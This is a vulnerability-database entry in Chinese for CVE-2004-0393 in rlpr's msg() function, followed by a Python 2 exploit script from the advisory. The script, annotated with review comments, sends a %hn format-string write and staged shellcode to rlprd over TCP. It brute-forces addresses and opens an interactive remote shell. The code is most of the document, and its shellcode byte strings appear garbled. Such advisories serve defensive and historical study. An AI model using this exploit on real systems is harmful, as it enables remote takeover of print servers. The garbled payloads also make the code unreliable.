Rlpr msg()函数多个安全漏洞
漏洞ID | 1108003 | 漏洞类型 | 输入验证 |
发布时间 | 2004-06-19 | 更新时间 | 2005-10-20 |
CVE编号 | CVE-2004-0393 |
CNNVD-ID | CNNVD-200412-033 |
漏洞平台 | Linux | CVSS评分 | 10.0 |
|漏洞来源
|漏洞详情
rlpr是一款不使用/etc/printcap的lpd打印工具。rlpr包含的msg()函数存在格式串和缓冲区溢出问题,本地或远程攻击者可以利用这个漏洞以rlprd进程权限执行任意指令。问题一是msg()调用syslog函数记录时没有进行任何过滤,提交格式串数据可能破坏内存信息。另外msg()函数对输入缺少充分缓冲区边界检查,可导致缓冲区溢出攻击。精心构建提交数据可能以rlprd进程(远程)或者root(本地)权限执行任意指令。
|漏洞EXP
source: http://www.securityfocus.com/bid/10578/info
It is reported that rlpr is prone to multiple vulnerabilities. These vulnerabilities can allow a remote attacker to execute arbitrary code in order to gain unauthorized access.
The application is affected by a format string vulnerability. This vulnerability presents itself due to insufficient sanitization of user-supplied data through the 'msg()' function.
The 'msg()' function is also affected by a buffer overflow vulnerability. This issue occurs due to insufficient boundary checking and may also be exploited to gain unauthorized access to a vulnerable computer.
rlpr versions 2.04 and prior are affected by these issues.
#!/usr/bin/python
import os, sys, socket, struct, time, telnetlib
class rlprd:
    """Historical proof-of-concept from the 2004 rlpr advisory (BID 10578, CVE-2004-0393).

    It drives the format-string bug in rlprd's msg() over TCP.  Kept here as an
    artefact of the advisory only: the listing is Python 2 syntax, the payload
    byte strings appear garbled in this rendering, and the success path calls a
    name that does not exist (``os.exit``).  For defenders the actionable facts
    are the vulnerable pattern -- caller-controlled text reaching syslog() as the
    format argument -- and the remedy named in the references (rlpr 2.04 and
    earlier are affected; see Debian DSA-524).
    """
    fd = None   # TCP socket to the target; created lazily by connect()
    pad = 2     # filler characters placed before the packed addresses in exploit()
    #00000000 31DB xor ebx,ebx
    #00000002 F7E3 mul ebx
    #00000004 B003 mov al,0x3
    #00000006 80C304 add bl,0x4
    #00000009 89E1 mov ecx,esp
    #0000000B 4A dec edx
    #0000000C CC int3
    #0000000D CD80 int 0x80
    #0000000F FFE1 jmp ecx
    # read(4, esp, -1); jmp ecx
    # Payload bytes as given in the advisory.  NOTE(review): in this rendering
    # the escape sequences look flattened, so these strings are not taken at
    # face value anywhere below.
    lnx_readsc = "x31xdbxf7xe3xb0x03x80xc3x04x89xe1x4axcdx80xffxe1"
    # Pads stage one up to 23 characters with the "x90" filler.  For the string
    # as rendered here the (23 - len) term is negative, so no padding is added.
    lnx_stage_one = "x90" * (23 - len(lnx_readsc)) + lnx_readsc
    # dup2 shellcode(4->0,1,2)
    lnx_stage_two = "x31xc0x89xc3x89xc1x89xc2xb2x3fx88xd0xb3x04"
    lnx_stage_two += "xcdx80x89xd0x41xcdx80x89xd0x41xcdx80"
    # execute /bin/sh
    lnx_stage_two += "x90" * 100
    lnx_stage_two += "x31xd2x52x68x6ex2fx73x68x68"
    lnx_stage_two += "x2fx2fx62x69x89xe3x52x53x89"
    lnx_stage_two += "xe1x8dx42x0bxcdx80"
    # Index 0 is the "brute force" sentinel selected by target id 0; index 1 is
    # a label plus two addresses (used as args[1] / args[2]).  run() never
    # consumes self.args -- the direct exploit() call there is commented out --
    # so only the brute-force path is live.
    targets = [ [ 0 ], [ "Compiled test platform", 0x0804c418, 0xbffff9e8 ] ]
    bruteforce = 0  # class default; __init__ sets the instance attribute to 1 for target 0

    def __init__(self, host, os, target, port=7290):
        """Record the target and select the payload set for ``os``.

        host, port: where rlprd listens (port defaults to 7290).
        os: platform name; only "linux" is recognised.  NOTE(review): the
            parameter shadows the ``os`` module, so the ``os._exit()`` below is
            attempted on a string (and without its required argument) and would
            raise rather than exit.
        target: index into ``targets``; 0 switches on brute forcing, any other
            value stores ``targets[target]`` in ``self.args``.
        """
        self.host = host
        self.port = port
        set = 0  # shadows the builtin; acts as a "recognised OS" flag
        if(os == "linux"):
            set = 1
            self.stage_one = self.lnx_stage_one
            self.stage_two = self.lnx_stage_two
        if(set == 0):
            print "Unknown OS"
            os._exit()
        self.os = os
        if(target == 0):
            self.bruteforce = 1
        else:
            self.args = self.targets[target]

    def wl16(self, write_byte):
        """Return the field width that brings the output count to ``write_byte`` mod 2**16.

        ``self.already_written`` tracks how many characters the format string
        has caused to be printed so far and is advanced by the returned width.
        Widths below 10 are bumped by 0x10000 (presumably so the ``%u`` field
        is never narrower than the number it prints -- not verifiable here).
        """
        write_byte += 0x10000
        self.already_written %= 0x10000
        padding = (write_byte - self.already_written) % 0x10000
        if(padding < 10):
            padding += 0x10000
        self.already_written += padding
        return padding

    def connect(self):
        """Open a fresh TCP connection to host:port and keep it in ``self.fd``.

        The commented-out block would have closed a previous socket; as written
        a stale ``self.fd`` is simply overwritten and the old descriptor leaks.
        """
        #if self.fd is not None:
        # self.fd.close()
        # self.fd = None
        self.fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
        self.fd.connect((self.host, self.port))

    def exploit(self, where, what):
        """Send one attempt that writes the 32-bit value ``what`` at address ``where``.

        Builds the format string -- ``pad`` filler characters, ``where`` and
        ``where + 2`` as packed little-endian longs, then two width/``%hn``
        pairs on positional parameters 7 and 8 for the low and high halves of
        ``what`` -- sends it together with stage one, then stage two and a probe
        command, and prints whatever comes back.  On any exception the socket
        is dropped and 0 is returned; otherwise the socket is handed to
        telnetlib for interaction.

        NOTE(review): the bare ``except`` hides the real error, and the final
        ``os.exit(0)`` is not an attribute of the os module, so it would raise
        once interact() returns.
        """
        if(not self.fd or self.fd is None): self.connect()
        # Characters the daemon's message is assumed to print before the
        # caller-controlled text -- presumably a fixed prefix inside msg();
        # not verifiable from this file.
        self.already_written = len('gethostbyname(')
        #print "# of nops: %dn" % (23 - len(self.readsc))
        exploit = "x" * self.pad
        self.already_written += self.pad
        exploit += struct.pack("<l", where)
        exploit += struct.pack("<l", where + 2)
        self.already_written += 8  # the two packed addresses above
        # Low half of ``what`` via positional parameter 7.
        l = self.wl16(what & 0xffff)
        fill = "%1$" + str(l) + "u"
        exploit += fill
        exploit += "%7$hn"
        # High half of ``what`` via positional parameter 8.
        l = self.wl16(what >> 16)
        fill = "%1$" + str(l) + "u"
        exploit += fill
        exploit += "%8$hn"
        #print "[*] Format string: (%s) Len: %d" % (exploit, len(exploit))
        #print "[*] Stage 1 length: %d" % len(self.stage_one)
        #time.sleep(5)
        try:
            self.fd.send(exploit + self.stage_one + "n")
            self.fd.send(self.stage_two)
            time.sleep(1)
            self.fd.send("echo spawned; uname -a; id -a;n")
            print "Recieved: " + self.fd.recv(1024)
        except:
            self.fd.close()
            self.fd = None
            print "tFailed @ 0x%08x" % what
            return 0
        remote = telnetlib.Telnet()
        remote.sock = self.fd
        print "[*] You should now have a shell"
        remote.interact()
        os.exit(0)

    def force(self, where, high, lo):
        """Call exploit() for every ``what`` from ``high`` down to ``lo`` in steps of 8.

        NOTE(review): this calls ``r.exploit`` -- the module-level ``r`` bound in
        the ``__main__`` block, not ``self`` -- so it only works when driven by
        the script.
        """
        for i in range(high, lo, -8):
            r.exploit(where, i)

    def run(self):
        """Entry point: brute force only; the targeted path is commented out.

        Sweeps ``where`` over 0x0804c000..0x0804d000 in steps of ``0x100 / 6``
        (42 under Python 2 integer division; a float under Python 3, which
        range() rejects) and for each runs force() from 0xbffffa00 down to
        0xbffff9c0.  With a non-zero target id nothing happens.
        """
        if(self.bruteforce):
            print "Bruteforcing.."
            #print "not implemented yet"
            #os._exit(1)
            for i in range(0x0804c000, 0x0804d000, 0x100 / 6):
                print "Trying: 0x%08x" % i
                self.force(i, 0xbffffa00, 0xbffff9c0)
            #self.exploit(self.args[1], self.args[2])
if __name__ == '__main__':
    # Usage: host, os name ("linux"), target id (0 = brute force, 1 = the
    # "Compiled test platform" entry).  NOTE(review): the usage line contains
    # a "%s" but no "%" operand, so it is printed literally, and the usage
    # error exits with status 0.
    if(len(sys.argv) != 4):
        print "%s host [linux] targetid"
        print "- 0 to brute force"
        print "- 1 custom compile"
        os._exit(0)
    # Echo the arguments, build the driver and run it; only the brute-force
    # path inside run() is live.
    print "%s-%s-%s" % (sys.argv[1], sys.argv[2], sys.argv[3])
    r = rlprd(sys.argv[1], sys.argv[2], int(sys.argv[3]))
    #r.exploit(0x0804c418, 0xbffff9e8)
    #r.force(0x0804c418, 0xbffffa00, 0xbffff800)
    r.run()
|参考资料
来源:XF
名称:rlpr-msg-format-string(16453)
链接:http://xforce.iss.net/xforce/xfdb/16453
来源:BID
名称:10578
链接:http://www.securityfocus.com/bid/10578
来源:DEBIAN
名称:DSA-524
链接:http://www.debian.org/security/2004/dsa-524
来源:BUGTRAQ
名称:20040624RlprAdvisory
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108810992313652&w=2
来源:BID
名称:10578
链接:http://www.securityfocus.com/bid/10578